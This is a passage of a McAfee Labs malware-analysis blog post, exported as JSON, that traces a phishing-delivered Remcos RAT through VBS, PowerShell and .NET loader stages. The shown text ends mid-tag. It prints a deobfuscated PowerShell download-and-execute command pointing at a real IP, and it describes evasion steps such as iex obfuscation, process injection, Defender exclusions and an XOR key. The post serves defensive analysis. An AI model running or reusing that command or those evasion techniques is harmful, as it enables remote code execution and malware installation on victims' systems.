{"id":173306,"date":"2023-08-29T10:00:49","date_gmt":"2023-08-29T17:00:49","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=173306"},"modified":"2023-12-08T20:31:11","modified_gmt":"2023-12-09T04:31:11","slug":"peeling-back-the-layers-of-remcosrat-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/","title":{"rendered":"Peeling Back the Layers of RemcosRat Malware"},"content":{"rendered":"<p>Authored by Preksha Saxena<\/p>\n<p><span data-contrast=\"none\">McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. <\/span><span data-contrast=\"auto\">A phishing email contained a ZIP\/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:240,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:240,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Execution Flow:<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:240,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h2>\n<p><span data-ccp-props=\"{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559738&quot;:0,&quot;335559739&quot;:240,&quot;335559740&quot;:240}\">\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173491 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture1.png\" alt=\"\" width=\"922\" height=\"165\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture1.png 922w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture1-300x54.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture1-768x137.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture1-205x37.png 205w\" sizes=\"auto, (max-width: 922px) 100vw, 922px\" \/>\u00a0<\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">1<\/span><\/i><i><span data-contrast=\"none\">: Execution Flow<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Stage 1: Analysis of VBS file<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">VBS file is downloaded from a RAR file which is named as \u201c<\/span><i><span data-contrast=\"auto\">August 2023 Statement of Account.z<\/span><\/i><span data-contrast=\"auto\">\u201d This VBS file used various techniques to make analysis very difficult; including lots of commented code, <\/span><span data-contrast=\"auto\">and <\/span><span data-contrast=\"auto\">random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Investigating this VBS script started with dealing with the large comment blocks as shown in figure below.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173505 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2.png\" alt=\"\" width=\"1588\" height=\"564\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2.png 1588w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2-300x107.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2-1024x364.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2-768x273.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2-1536x546.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture2-205x73.png 205w\" sizes=\"auto, (max-width: 1588px) 100vw, 1588px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">2<\/span><\/i><i><span data-contrast=\"none\">:VBS Script<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><span data-contrast=\"auto\">One obfuscated string references a URL. The script <\/span><span data-contrast=\"auto\">contains<\/span><span data-contrast=\"auto\"> a replace function <\/span><span data-contrast=\"auto\">to <\/span><span data-contrast=\"auto\">deobfuscate the proper command line.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Another part of VBS script is the execute function shown in below image, which merely decodes a fake message.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">&#8220;omg!it&#8217;s_so_long_:-)you_found_the_secret_message_congrats!!&#8221;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173519 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture3.png\" alt=\"\" width=\"981\" height=\"257\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture3.png 981w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture3-300x79.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture3-768x201.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture3-205x54.png 205w\" sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">3<\/span><\/i><i><span data-contrast=\"none\">:Deobfuscating PowerShell command using replace function.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><span data-contrast=\"auto\">The purpose of this VBS script is to download a <\/span><span data-contrast=\"auto\">payload <\/span><span data-contrast=\"auto\">using PowerShell. To increase the size<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\"> and make the script obfuscated<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\"> comments were added. The PowerShell command <\/span><span data-contrast=\"auto\">deobfuscates<\/span><span data-contrast=\"auto\"> to:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"auto\">&#8220;powershell -w 1 -exeC Bypass -c &#8220;&#8221;[scriptblock]::<\/span><\/i><i><span data-contrast=\"auto\">Create<\/span><\/i> <i><span data-contrast=\"auto\">(<\/span><\/i><i><span data-contrast=\"auto\">(Invoke-WebRequest &#8216;http:\/\/212.192.219.52\/87656.txt&#8217; -UseBasicParsing).Content).Invoke();&#8221;&#8221;&#8221;<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Stage 2: Analysis of PowerShell script (87656.txt)\u00a0<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">The downloaded file<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\"> 87656.txt, is an obfuscated PowerShell script.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173533 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4.png\" alt=\"\" width=\"1642\" height=\"297\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4.png 1642w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4-300x54.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4-1024x185.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4-768x139.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4-1536x278.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture4-205x37.png 205w\" sizes=\"auto, (max-width: 1642px) 100vw, 1642px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">4<\/span><\/i><i><span data-contrast=\"none\">:Obfuscated PowerShell Script<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><span data-contrast=\"auto\">The deobfuscation logic first searches for any variable containing \u201cmdR\u201d; in this case<\/span> <span data-contrast=\"auto\">the result is \u2018<\/span><i><span data-contrast=\"auto\">MaximumDriveCount\u2019. <\/span><\/i><span data-contrast=\"auto\">From this string, characters at positions [3,11,2] are selected, resulting in the string \u201ciex\u201d. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173547 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture5.png\" alt=\"\" width=\"1139\" height=\"436\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture5.png 1139w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture5-300x115.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture5-1024x392.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture5-768x294.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture5-205x78.png 205w\" sizes=\"auto, (max-width: 1139px) 100vw, 1139px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">5<\/span><\/i><i><span data-contrast=\"none\">:Resolving IEX<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Decompressed data is again a PowerShell script which is analyzed below.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Stage 3: Analysis of decompressed PowerShell script\u00a0<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">The decompressed PowerShell script is large and obfuscated:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173561 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture6.png\" alt=\"\" width=\"1143\" height=\"513\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture6.png 1143w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture6-300x135.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture6-1024x460.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture6-768x345.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture6-205x92.png 205w\" sizes=\"auto, (max-width: 1143px) 100vw, 1143px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">6<\/span><\/i><i><span data-contrast=\"none\">: Decompressed PowerShell script<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression \u201cieX\u201d by using the psHome variable.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173575 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture7.png\" alt=\"\" width=\"1326\" height=\"301\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture7.png 1326w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture7-300x68.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture7-1024x232.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture7-768x174.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture7-205x47.png 205w\" sizes=\"auto, (max-width: 1326px) 100vw, 1326px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">7<\/span><\/i><i><span data-contrast=\"none\">:Deobfuscating PowerShell script<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173673 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture-8.png\" alt=\"\" width=\"1137\" height=\"500\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture-8.png 1137w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture-8-300x132.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture-8-1024x450.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture-8-768x338.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture-8-205x90.png 205w\" sizes=\"auto, (max-width: 1137px) 100vw, 1137px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">8<\/span><\/i><i><span data-contrast=\"none\">: Base64 encoded data.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. \u201cWintask.exe\u201d is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p style=\"text-align: center;\"><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173589 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture9.png\" alt=\"\" width=\"1187\" height=\"559\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture9.png 1187w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture9-300x141.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture9-1024x482.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture9-768x362.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture9-205x97.png 205w\" sizes=\"auto, (max-width: 1187px) 100vw, 1187px\" \/>\u00a0<\/span><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">9<\/span><\/i><i><span data-contrast=\"none\">: Code used for PE injection.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Windows Defender exclusions are added.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173603 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture10.png\" alt=\"\" width=\"1203\" height=\"195\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture10.png 1203w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture10-300x49.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture10-1024x166.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture10-768x124.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture10-205x33.png 205w\" sizes=\"auto, (max-width: 1203px) 100vw, 1203px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">10<\/span><\/i><i><span data-contrast=\"none\">: Exclusion code<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Stage 4: Analysis of decoded PE File\u00a0<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">The 1.1MB PE file is a <\/span><span data-contrast=\"auto\">.<\/span><span data-contrast=\"auto\">NET<\/span><span data-contrast=\"auto\"> binary, using an MSIL loader.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173617 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture11.png\" alt=\"\" width=\"830\" height=\"349\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture11.png 830w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture11-300x126.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture11-768x323.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture11-205x86.png 205w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">11<\/span><\/i><i><span data-contrast=\"none\">: MSIL Loader<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The Main function calls the Units function<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\"> which calls a random function.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173631 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture12.png\" alt=\"\" width=\"1144\" height=\"858\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture12.png 1144w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture12-300x225.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture12-1024x768.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture12-768x576.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture12-172x129.png 172w\" sizes=\"auto, (max-width: 1144px) 100vw, 1144px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">12<\/span><\/i><i><span data-contrast=\"none\">:Main function<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The random function contains a large amount of encrypted data, stored in a text variable.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173645 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture13.png\" alt=\"\" width=\"1161\" height=\"331\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture13.png 1161w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture13-300x86.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture13-1024x292.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture13-768x219.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture13-205x58.png 205w\" sizes=\"auto, (max-width: 1161px) 100vw, 1161px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">13<\/span><\/i><i><span data-contrast=\"none\">: Encrypted data<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The <\/span><i><span data-contrast=\"auto\">\u2018text\u2019 <\/span><\/i><span data-contrast=\"auto\">data is first converted from string to hex array then reversed and stored in variable \u2018<\/span><i><span data-contrast=\"auto\">array<\/span><\/i><span data-contrast=\"auto\">\u2019. The decryption key is hardcoded and stored in variable \u2018<\/span><i><span data-contrast=\"auto\">array4\u2019<\/span><\/i><span data-contrast=\"auto\">. The key is \u201c<\/span><i><span data-contrast=\"auto\">0xD7<\/span><\/i><span data-contrast=\"auto\">\u201d (215 in decimal).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173659 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture14.png\" alt=\"\" width=\"1308\" height=\"598\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture14.png 1308w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture14-300x137.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture14-1024x468.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture14-768x351.png 768w, 